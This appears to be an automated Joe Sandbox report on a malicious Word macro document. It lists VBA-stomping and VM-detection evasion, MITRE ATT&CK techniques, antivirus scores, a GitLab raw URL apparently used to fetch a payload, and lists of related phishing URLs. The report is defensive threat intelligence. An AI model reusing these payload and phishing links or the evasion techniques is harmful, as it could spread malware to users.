Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\SystemSettingsBroker.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\SystemSettingsBroker.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\SystemSettingsBroker.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\SystemSettingsBroker.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\SystemSettingsBroker.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\SystemSettingsBroker.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\SystemSettingsBroker.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\SystemSettingsBroker.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\SystemSettingsBroker.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Windows\System32\drivers\rasl2tp.sys

Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e972-e325-11ce-bfc1-08002be10318}\0004 name: DriverDesc

Jump to behavior

Source: q9JZUaS1Gy.doc

Stream path 'Macros/VBA/Module3' : , ByVal dwLanguageId As Long, ByVal lpBuffer As String, ByVa

Source: SystemSettingsBroker.exe, 0000000E.00000002.6762304179.0000024EDF252000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMware Virtual USB Mouse
Source: SystemSettingsBroker.exe, 0000000E.00000003.3145692938.0000024EDF2A9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
Source: SystemSettingsBroker.exe, 0000000E.00000003.3145692938.0000024EDF2A9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMware Virtual disk SCSI Disk Device"
Source: SystemSettingsBroker.exe, 0000000E.00000003.3145692938.0000024EDF2A9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: NECVMWar VMware SATA CD00<
Source: SystemSettingsBroker.exe, 0000000E.00000003.3147405041.0000024EDF268000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: BBSCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
Source: SystemSettingsBroker.exe, 0000000E.00000003.3147405041.0000024EDF268000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 4NECVMWar VMware SATA CD00
Source: SystemSettingsBroker.exe, 0000000E.00000002.6762408734.0000024EDF266000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ..SWD\COMPUTER\MFG_VMware__Inc.&PROD_VMware20_1
Source: SystemSettingsBroker.exe, 0000000E.00000002.6762193840.0000024EDF22A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Drivertion Infrastructure Driver
Source: SystemSettingsBroker.exe, 0000000E.00000003.3147374594.0000024EDF265000.00000004.00000020.00020000.00000000.sdmp, SystemSettingsBroker.exe, 0000000E.00000003.3440884411.0000024EDF265000.00000004.00000020.00020000.00000000.sdmp, SystemSettingsBroker.exe, 0000000E.00000002.6762408734.0000024EDF266000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: @wvid.inf,%vid.devicedesc%;Microsoft Hyper-V Virtualization Infrastructure Driverp
Source: SystemSettingsBroker.exe, 0000000E.00000002.6762070324.0000024EDF200000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMware, Inc. VMware20,1
Source: SystemSettingsBroker.exe, 0000000E.00000003.3147374594.0000024EDF265000.00000004.00000020.00020000.00000000.sdmp, SystemSettingsBroker.exe, 0000000E.00000003.3440884411.0000024EDF265000.00000004.00000020.00020000.00000000.sdmp, SystemSettingsBroker.exe, 0000000E.00000002.6762408734.0000024EDF266000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: @wgencounter.inf,%gencounter.devicedesc%;Microsoft Hyper-V Generation Counter
Source: SystemSettingsBroker.exe, 0000000E.00000003.3147405041.0000024EDF268000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: v@oem1.inf,%loc.vmwarebusdevicedesc%;VMware VMCI Bus Devicep
Source: SystemSettingsBroker.exe, 0000000E.00000002.6762147504.0000024EDF215000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMware VMCI Bus Devicesdevicedesc%;VMware VMCI Bus Device
Source: SystemSettingsBroker.exe, 0000000E.00000003.3145692938.0000024EDF2A9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
Source: SystemSettingsBroker.exe, 0000000E.00000002.6762408734.0000024EDF266000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 0VMware, Inc. VMware20,1
Source: SystemSettingsBroker.exe, 0000000E.00000003.3147405041.0000024EDF268000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ;;SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
Source: SystemSettingsBroker.exe, 0000000E.00000003.3147405041.0000024EDF268000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: JVMware Virtual disk SCSI Disk Device
Source: SystemSettingsBroker.exe, 0000000E.00000002.6762070324.0000024EDF200000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SWD\COMPUTER\MFG_VMware__Inc.&PROD_VMware20_1

Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE

Process information queried: ProcessInformation

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Document contains VBA stomped code (only p-code) potentially bypassing AV detection

Source: q9JZUaS1Gy.doc

OLE indicator, VBA stomping: true

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	52 Scripting	Valid Accounts	Windows Management Instrumentation	1 LSASS Driver	1 LSASS Driver	1 Masquerading	OS Credential Dumping	11 Security Software Discovery	Remote Services	Data from Local System	1 Application Layer Protocol	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	52 Scripting	1 Process Injection	1 Virtualization/Sandbox Evasion	LSASS Memory	1 Virtualization/Sandbox Evasion	Remote Desktop Protocol	Data from Removable Media	Junk Data	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	1 Obfuscated Files or Information	1 DLL Side-Loading	1 Process Injection	Security Account Manager	1 Process Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	Steganography	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	1 DLL Side-Loading	Login Hook	1 Deobfuscate/Decode Files or Information	NTDS	1 File and Directory Discovery	Distributed Component Object Model	Input Capture	Protocol Impersonation	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	2 System Information Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
q9JZUaS1Gy.doc	53%	Virustotal		Browse
q9JZUaS1Gy.doc	39%	ReversingLabs	Script-Macro.Trojan.Amphitryon
q9JZUaS1Gy.doc	100%	Joe Sandbox ML

Name	Source	Malicious	Antivirus Detection	Reputation
https://gitlab.com/app8490744/updatesa/-/raw/main/up$	q9JZUaS1Gy.doc	false		high
https://gitlab.com/app8490744/updatesa/-/raw/main/up$v	q9JZUaS1Gy.doc	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
52.113.194.132	unknown	United States	8068	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
52.109.68.129	unknown	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
52.111.236.32	unknown	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
52.109.28.46	unknown	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
23.38.98.104	unknown	United States	16625	AKAMAI-ASUS	false
52.109.76.144	unknown	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
20.44.10.122	unknown	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1590807
Start date and time:	2025-01-14 15:29:47 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 11m 52s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 11 23H2 with Office Professional Plus 2021, Chrome 131, Firefox 133, Adobe Reader DC 24, Java 8 Update 431, 7zip 24.09
Run name:	Potential for more IOCs and behavior
Number of analysed new started processes analysed:	24
Number of new started drivers analysed:	8
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled GSI enabled (VBA) AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	q9JZUaS1Gy.doc renamed because original name is a hash value
Original Sample Name:	0f53abadce48014ec8ea5458af9b732ed1ea6d612b54b261a0e60928e36e86f1.doc
Detection:	MAL
Classification:	mal76.expl.evad.winDOC@4/2@0/7
EGA Information:	Failed
HCA Information:	Successful, ratio: 100% Number of executed functions: 0 Number of non-executed functions: 0
Cookbook Comments:	Found application associated with file extension: .doc

Warnings

Max analysis timeout: 600s exceeded, the analysis took too long
Exclude process from analysis (whitelisted): MpCmdRun.exe, SecurityHealthHost.exe, RuntimeBroker.exe, ShellExperienceHost.exe, WMIADAP.exe, SIHClient.exe, appidcertstorecheck.exe, conhost.exe, backgroundTaskHost.exe, WmiPrvSE.exe, svchost.exe
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Report size getting too big, too many NtSetValueKey calls found.
Skipping network analysis since amount of network traffic is too extensive

Input	Output
URL: email Model: Joe Sandbox AI	{ "risk_score": 1, "reasoning": [ "No headers provided to analyze", "Cannot make security assessment without header information", "Default to low risk score due to lack of evidence" ] }
Date: unknown
URL: Office document Model: Joe Sandbox AI	{ "contains_trigger_text": false, "trigger_text": "unknown", "prominent_button_name": "unknown", "text_input_field_labels": "unknown", "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": false, "has_visible_qrcode": false, "contains_chinese_text": false, "contains_fake_security_alerts": false }

URL: Office document Model: Joe Sandbox AI	{ "brands": "unknown" }
	{ "brands": "unknown" }
URL: Screenshot id: 5 Model: Joe Sandbox AI	{ "contains_trigger_text": false, "trigger_text": "unknown", "prominent_button_name": "unknown", "text_input_field_labels": "unknown", "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": false, "has_visible_qrcode": false, "contains_chinese_text": false, "contains_fake_security_alerts": false }

URL: Screenshot id: 2 Model: Joe Sandbox AI	{ "contains_trigger_text": false, "trigger_text": "unknown", "prominent_button_name": "unknown", "text_input_field_labels": "unknown", "pdf_icon_visible": false, "has_visible_captcha": true, "has_urgent_text": false, "has_visible_qrcode": false, "contains_chinese_text": false, "contains_fake_security_alerts": true }

URL: Screenshot id: 4 Model: Joe Sandbox AI	{ "contains_trigger_text": false, "trigger_text": "unknown", "prominent_button_name": "unknown", "text_input_field_labels": "unknown", "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": false, "has_visible_qrcode": false, "contains_chinese_text": false, "contains_fake_security_alerts": false }

URL: Screenshot id: 11 Model: Joe Sandbox AI	{ "contains_trigger_text": false, "trigger_text": "unknown", "prominent_button_name": "unknown", "text_input_field_labels": "unknown", "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": false, "has_visible_qrcode": false, "contains_chinese_text": false, "contains_fake_security_alerts": false }

URL: Screenshot id: 10 Model: Joe Sandbox AI	{ "contains_trigger_text": false, "trigger_text": "unknown", "prominent_button_name": "unknown", "text_input_field_labels": "unknown", "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": false, "has_visible_qrcode": false, "contains_chinese_text": false, "contains_fake_security_alerts": false }

URL: Screenshot id: 9 Model: Joe Sandbox AI	{ "contains_trigger_text": false, "trigger_text": "unknown", "prominent_button_name": "unknown", "text_input_field_labels": "unknown", "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": false, "has_visible_qrcode": false, "contains_chinese_text": false, "contains_fake_security_alerts": false }

URL: Screenshot id: 3 Model: Joe Sandbox AI	{ "contains_trigger_text": false, "trigger_text": "unknown", "prominent_button_name": "unknown", "text_input_field_labels": "unknown", "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": false, "has_visible_qrcode": false, "contains_chinese_text": false, "contains_fake_security_alerts": false }

URL: Screenshot id: 12 Model: Joe Sandbox AI	{ "contains_trigger_text": false, "trigger_text": "unknown", "prominent_button_name": "unknown", "text_input_field_labels": "unknown", "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": false, "has_visible_qrcode": false, "contains_chinese_text": false, "contains_fake_security_alerts": false }

URL: Screenshot id: 6 Model: Joe Sandbox AI	{ "contains_trigger_text": false, "trigger_text": "unknown", "prominent_button_name": "unknown", "text_input_field_labels": "unknown", "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": false, "has_visible_qrcode": false, "contains_chinese_text": false, "contains_fake_security_alerts": false }

URL: Screenshot id: 8 Model: Joe Sandbox AI	{ "contains_trigger_text": false, "trigger_text": "unknown", "prominent_button_name": "unknown", "text_input_field_labels": "unknown", "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": false, "has_visible_qrcode": false, "contains_chinese_text": false, "contains_fake_security_alerts": false }

URL: Screenshot id: 14 Model: Joe Sandbox AI	{ "contains_trigger_text": false, "trigger_text": "unknown", "prominent_button_name": "unknown", "text_input_field_labels": "unknown", "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": false, "has_visible_qrcode": false, "contains_chinese_text": false, "contains_fake_security_alerts": false }

URL: Screenshot id: 13 Model: Joe Sandbox AI	{ "contains_trigger_text": false, "trigger_text": "unknown", "prominent_button_name": "unknown", "text_input_field_labels": "unknown", "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": false, "has_visible_qrcode": false, "contains_chinese_text": false, "contains_fake_security_alerts": false }

URL: Screenshot id: 7 Model: Joe Sandbox AI	{ "contains_trigger_text": false, "trigger_text": "unknown", "prominent_button_name": "unknown", "text_input_field_labels": "unknown", "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": false, "has_visible_qrcode": false, "contains_chinese_text": false, "contains_fake_security_alerts": false }

URL: Screenshot id: 2 Model: Joe Sandbox AI	{ "brands": "unknown" }
	{ "brands": "unknown" }
URL: Screenshot id: 5 Model: Joe Sandbox AI	{ "brands": "unknown" }
	{ "brands": "unknown" }
URL: Screenshot id: 8 Model: Joe Sandbox AI	{ "brands": "unknown" }
	{ "brands": "unknown" }
URL: Screenshot id: 12 Model: Joe Sandbox AI	{ "brands": "unknown" }
	{ "brands": "unknown" }
URL: Screenshot id: 10 Model: Joe Sandbox AI	{ "brands": "unknown" }
	{ "brands": "unknown" }
URL: Screenshot id: 6 Model: Joe Sandbox AI	{ "brands": "unknown" }
	{ "brands": "unknown" }
URL: Screenshot id: 3 Model: Joe Sandbox AI	{ "brands": "unknown" }
	{ "brands": "unknown" }
URL: Screenshot id: 9 Model: Joe Sandbox AI	{ "brands": "unknown" }
	{ "brands": "unknown" }
URL: Screenshot id: 4 Model: Joe Sandbox AI	{ "brands": "unknown" }
	{ "brands": "unknown" }
URL: Screenshot id: 13 Model: Joe Sandbox AI	{ "brands": "unknown" }
	{ "brands": "unknown" }
URL: Screenshot id: 14 Model: Joe Sandbox AI	{ "brands": "unknown" }
	{ "brands": "unknown" }
URL: Screenshot id: 11 Model: Joe Sandbox AI	{ "brands": "unknown" }
	{ "brands": "unknown" }
URL: Screenshot id: 7 Model: Joe Sandbox AI	{ "brands": "unknown" }
	{ "brands": "unknown" }

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
52.113.194.132	original.eml	Get hash	malicious	Unknown	Browse
	3WzEuwT4vN.eml	Get hash	malicious	Unknown	Browse
	possible SPAM## Msig Insurance Europe Complete via-Sign Monday January 2025.msg	Get hash	malicious	Unknown	Browse
	phishing.eml	Get hash	malicious	Phisher	Browse
	https://timecusa-my.sharepoint.com/:f:/p/stephensw/Erq5TMDIJBVBvh6vbWmpurEB4UwHKTW8nzSkPE2Ckmvugg?e=SepTcT	Get hash	malicious	HTMLPhisher	Browse
	phish_alert_sp2_2.0.0.0.eml	Get hash	malicious	Unknown	Browse
	Cardfactory Executed Agreement DocsID- Sign & Review..eml	Get hash	malicious	HTMLPhisher	Browse
	ACC NUM - D0278.eml	Get hash	malicious	Unknown	Browse
	Message 2.eml	Get hash	malicious	Unknown	Browse
	Message.eml	Get hash	malicious	Unknown	Browse
52.109.68.129	phishing.eml	Get hash	malicious	Phisher	Browse
	Quarantined Messages(3).zip	Get hash	malicious	HTMLPhisher	Browse
	message__51fa7b20_1571_b6cf_e82f_a6f0e2bfa4a2_jamestraversgarage_ie_.eml	Get hash	malicious	Unknown	Browse
	Quarantined Messages(3).zip	Get hash	malicious	HTMLPhisher	Browse
	phish_alert_iocp_v1.4.48 - 2024-12-26T095152.060.eml	Get hash	malicious	Unknown	Browse
	5diately.msg	Get hash	malicious	Unknown	Browse
	Herinnering.msg	Get hash	malicious	Unknown	Browse
	attachment.eml	Get hash	malicious	Unknown	Browse
	message__86_4F_17774_8082F476_ccg01mail04_.eml	Get hash	malicious	Unknown	Browse
	FW Microsoft account unusual sign-in activity.msg	Get hash	malicious	Unknown	Browse
52.111.236.32	Untitled.msg	Get hash	malicious	HTMLPhisher	Browse
52.111.236.32	44zg1cvu.msg	Get hash	malicious	HTMLPhisher	Browse
52.109.28.46	3WzEuwT4vN.eml	Get hash	malicious	Unknown	Browse
	7ccf88c0bbe3b29bf19d877c4596a8d4.zip	Get hash	malicious	Unknown	Browse
	Quarantined Messages(3).zip	Get hash	malicious	HTMLPhisher	Browse
	Google Authenticator You're trying to sign in from a new location.msg	Get hash	malicious	Unknown	Browse
	phish_alert_sp2_2.0.0.0.eml	Get hash	malicious	Unknown	Browse
	2024 Tepa LLC RFP Proposal.docx	Get hash	malicious	Unknown	Browse
	427c7bdc-ea02-97de-e5ef-a2c58c2d0a48.eml	Get hash	malicious	Unknown	Browse
	phish_alert_sp2_2.0.0.0.eml	Get hash	malicious	Unknown	Browse
	message__86_4F_17774_8082F476_ccg01mail04_.eml	Get hash	malicious	Unknown	Browse
	phish_alert_sp2_2.0.0.0.eml	Get hash	malicious	Unknown	Browse
23.38.98.104	https://estudioit.cl/starl/#ZGVicmEuY2FydGVyQGNhc2EuZ292LmF1	Get hash	malicious	Unknown	Browse
	Portfolio Review _2024.html	Get hash	malicious	Unknown	Browse
	https://nleco-my.sharepoint.com/:u:/p/smartin/EYZSur4py4xKna-WAI8lgIkBS_KVLZwaA2d1wGxZA5Gdvw?e=wwT7sT	Get hash	malicious	HtmlDropper, HTMLPhisher	Browse
	https://hrdesign-my.sharepoint.com/:u:/g/personal/scott_hrdesigninc_com/EbJc5KBDp9FFtlL1fhxyW3gB4XLFt1qWVv8kUYI0bqQizQ?e=j79cKg	Get hash	malicious	Unknown	Browse
	https://1drv.ms/o/c/66fa7da2ba9759b3/EqcaXs4PlQlIgYgaPtxczNwB_gWaZXRP_eT5RhV50i4cxw?e=5%3aJHIMrP&sharingv2=true&fromShare=true&at=9	Get hash	malicious	Unknown	Browse
	https://360merch-my.sharepoint.com/:u:/p/derek_cummins/Ee8aHkzMy41OgT5fOyc3qz4BdRJzT4bTlOlXY3v0Xazn9Q?e=hZ7jfl	Get hash	malicious	Unknown	Browse
	https://apollomicsinc-my.sharepoint.com/:u:/p/peony_yu/EThcAjzaTWNPs4NpIP1X0v0BUe4pmKNB9s6TANBDk5EDeA?rtime=8VndtY_33Eg	Get hash	malicious	HtmlDropper	Browse
	EXTERNALRoger Moczygemba shared DIRECT MED CLINIC - CONFIDENTIAL with you.msg	Get hash	malicious	Unknown	Browse
	https://1drv.ms/o/c/3e563d3fb2a98d1c/Emlo5KUbYYNEvKtIF-7SS0EBYSeT3hOOGuv_MbeT-n2y4g?e=HPjqUn	Get hash	malicious	HtmlDropper	Browse
	INV00663.docx	Get hash	malicious	HTMLPhisher	Browse

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
MICROSOFT-CORP-MSN-AS-BLOCKUS	original.eml	Get hash	malicious	Unknown	Browse	20.42.73.31
	x86_64.elf	Get hash	malicious	Unknown	Browse	52.121.12.85
	https://cloud.uibakery.io/share/Z0My4XaLtq/home	Get hash	malicious	Unknown	Browse	20.150.43.228
	http://links.notification.intuit.com/ls/click?upn=u001.Hu9nToJLxsJSQR8ZHWn8Ib7JikYF6PNXv5VK-2BAfeSpVHPRNy-2BFDtJ-2BhNUfKXTverofrKjvXVKH4ba5KbTX-2BS4d1fnHXIidRtPiokrK2um0Eple-2FkJVLqDQnYz8JTbzkA9WlXWZlL3ivdsx3brpVaTH-2FK6m9Qw3cu-2BvTOlnjPR-2BRQieb3dMUHHYNG5OQm5ryxF0Fsg8fRojMxisWNsOHrH9C1cyNh2C-2BapzmizNqUYRxhHtg93ylBbIqH4SXA-2BcyHnCgzv3EsQu4AeMgUYmPWnA-3D-3DLdh5_yvrO630WiuT7pZuPPGURxafPbqYMaSDh9TJohqr8UezRE8eV8vDlm-2BTA5TmdEDZ7yETp46OEIM2MjRx5Mgc-2FSy44clVANtwLrq3nrTfwacsucNAXy1OR1t4kO8Runkcodfdl27Tk2P3ljoutL4PngQr5QuG6-2BzAFT5LByFkcNsd4ZN4BjPhWe-2FurNg8n55w3pC1a745KRvgSQJLhnfGqvVCPndWBC-2FrOGmouU9sI8e8126CrPE36g6YnfTU62FfgD4iz7YqhY5ClzJJ1rfDytmBE27deoiPYjSCUIOExKeOY9BXwol6hEnBu1JrowSiwfKjh7zwfuBtmrvZ6vSOSA4TPvkxfFcg8BlrW1vQm3N4xNhNATHmDPJ14VDZ37GTEiI3qtLYdiyXWWkTzMMnRfMqqHTb6pk7iw0nQ-2B-2F-2BoVFAByTiDqFl-2BEIRuBMpx3EAFKUBzR-2BFkYOUJfVO0AgKNNrj8RX8iEkzqu1jtQg7ixHYmsOTyS67b-2FfHfta82o4E2JYjYGlK5-2B4oC7YaK6nqpfLyDha24FrKV-2FLp72I4nvgzKLPEnT5ZwYuSOhCg3YVBTmOz2nIgG2JSkyg5oeFqAqgkNSx8fK8zislf-2BrA2fYIACU0BIPGyf0fmRMsEmqkL-2Bp3BFpdaGyMHdF1x-2BecUEBz6lLoiPwOcsUtngmDNDJXvvknBRqzikOl9M6fGqG3fXa1gCTdQ65koy28-2F-2BBWPXowJpnZS4HZIyZUo5CD6QHJWBreucOVPnNwQeZjC-2FzCK4Cce5NO367-2F8X6iGngzToJ76PKlG3iKmQrD2mUaULlSVRgzOCG3qGCu5c3-2FNswHxTGs5sX1Z4U8SbnKLBV1PKGCxM9T4n09h2aVmLlExK8v00nv29XzsU7Po9gelTF-2FjMSswYLkMiSOnzlY2BCdCwDuNC1nvBteBGpD-2F22OmpeXpRAaJ0J-2B4lsJiYMNTfeLTVpUwXJ8O1S1sYa5RHOdrs-2FcoPQw3UvxHuDk-2F8iCLoYwSk9C9RD2cz2elRWzi1C1ns-2FlhCnZAhjcKv9Z9Ae1z44jmN81TExev-2BlHq6EzmdhrItggowvzubiVKpLOI41-2FppAUrbGiqMHyKjd3-2F4kk-2Flz32iYslSzl6Dn0eXeS9GKE-2Bpl29Z6ROXa7u-2B5uui0VMIdUdli6dq52DdaYFYPlzSXZJZD6dU1iBoKstrswPNVadTn-2FAGgQ05qSC-2Bkb7G8HU-2BK5xqU5Ufalh9-2FjFROiYaxD3E-2Bu8NoLa7LrZn2WpO-2F0jyY6Vd6CrNPSPrDmzB8lSbamUhpcGSHkMvagS5o-2By7jAAciI99IX68zm80Q3YVM-2BJI1Dy0kwunCbTG4zRPUdxDxmPiGishQoGtkqOda43zr5FgVLFBsuyricc5CP0Uj0NZhEVb-2Br-2FOT93qdqnJE6-2FTp6T2R9YtWtiv-2BEfeLsX6gcdvCtN3M6I13WFY-2ByaP1CVexX5752k6SmFvyspk50Eq	Get hash	malicious	Unknown	Browse	52.238.253.184
	i486.elf	Get hash	malicious	Unknown	Browse	20.124.86.158
	http://links.notification.intuit.com/ls/click?upn=u001.Hu9nToJLxsJSQR8ZHWn8Ib7JikYF6PNXv5VK-2BAfeSpVHPRNy-2BFDtJ-2BhNUfKXTverofrKjvXVKH4ba5KbTX-2BS4d1fnHXIidRtPiokrK2um0Eple-2FkJVLqDQnYz8JTbzkA9WlXWZlL3ivdsx3brpVaTH-2FK6m9Qw3cu-2BvTOlnjPR-2BRQieb3dMUHHYNG5OQm5ryxF0Fsg8fRojMxisWNsOHrH9C1cyNh2C-2BapzmizNqUYRxhHtg93ylBbIqH4SXA-2BcyHnCgzv3EsQu4AeMgUYmPWnA-3D-3DLdh5_yvrO630WiuT7pZuPPGURxafPbqYMaSDh9TJohqr8UezRE8eV8vDlm-2BTA5TmdEDZ7yETp46OEIM2MjRx5Mgc-2FSy44clVANtwLrq3nrTfwacsucNAXy1OR1t4kO8Runkcodfdl27Tk2P3ljoutL4PngQr5QuG6-2BzAFT5LByFkcNsd4ZN4BjPhWe-2FurNg8n55w3pC1a745KRvgSQJLhnfGqvVCPndWBC-2FrOGmouU9sI8e8126CrPE36g6YnfTU62FfgD4iz7YqhY5ClzJJ1rfDytmBE27deoiPYjSCUIOExKeOY9BXwol6hEnBu1JrowSiwfKjh7zwfuBtmrvZ6vSOSA4TPvkxfFcg8BlrW1vQm3N4xNhNATHmDPJ14VDZ37GTEiI3qtLYdiyXWWkTzMMnRfMqqHTb6pk7iw0nQ-2B-2F-2BoVFAByTiDqFl-2BEIRuBMpx3EAFKUBzR-2BFkYOUJfVO0AgKNNrj8RX8iEkzqu1jtQg7ixHYmsOTyS67b-2FfHfta82o4E2JYjYGlK5-2B4oC7YaK6nqpfLyDha24FrKV-2FLp72I4nvgzKLPEnT5ZwYuSOhCg3YVBTmOz2nIgG2JSkyg5oeFqAqgkNSx8fK8zislf-2BrA2fYIACU0BIPGyf0fmRMsEmqkL-2Bp3BFpdaGyMHdF1x-2BecUEBz6lLoiPwOcsUtngmDNDJXvvknBRqzikOl9M6fGqG3fXa1gCTdQ65koy28-2F-2BBWPXowJpnZS4HZIyZUo5CD6QHJWBreucOVPnNwQeZjC-2FzCK4Cce5NO367-2F8X6iGngzToJ76PKlG3iKmQrD2mUaULlSVRgzOCG3qGCu5c3-2FNswHxTGs5sX1Z4U8SbnKLBV1PKGCxM9T4n09h2aVmLlExK8v00nv29XzsU7Po9gelTF-2FjMSswYLkMiSOnzlY2BCdCwDuNC1nvBteBGpD-2F22OmpeXpRAaJ0J-2B4lsJiYMNTfeLTVpUwXJ8O1S1sYa5RHOdrs-2FcoPQw3UvxHuDk-2F8iCLoYwSk9C9RD2cz2elRWzi1C1ns-2FlhCnZAhjcKv9Z9Ae1z44jmN81TExev-2BlHq6EzmdhrItggowvzubiVKpLOI41-2FppAUrbGiqMHyKjd3-2F4kk-2Flz32iYslSzl6Dn0eXeS9GKE-2Bpl29Z6ROXa7u-2B5uui0VMIdUdli6dq52DdaYFYPlzSXZJZD6dU1iBoKstrswPNVadTn-2FAGgQ05qSC-2Bkb7G8HU-2BK5xqU5Ufalh9-2FjFROiYaxD3E-2Bu8NoLa7LrZn2WpO-2F0jyY6Vd6CrNPSPrDmzB8lSbamUhpcGSHkMvagS5o-2By7jAAciI99IX68zm80Q3YVM-2BJI1Dy0kwunCbTG4zRPUdxDxmPiGishQoGtkqOda43zr5FgVLFBsuyricc5CP0Uj0NZhEVb-2Br-2FOT93qdqnJE6-2FTp6T2R9YtWtiv-2BEfeLsX6gcdvCtN3M6I13WFY-2ByaP1CVexX5752k6SmFvyspk50Eq	Get hash	malicious	Unknown	Browse	52.141.217.134
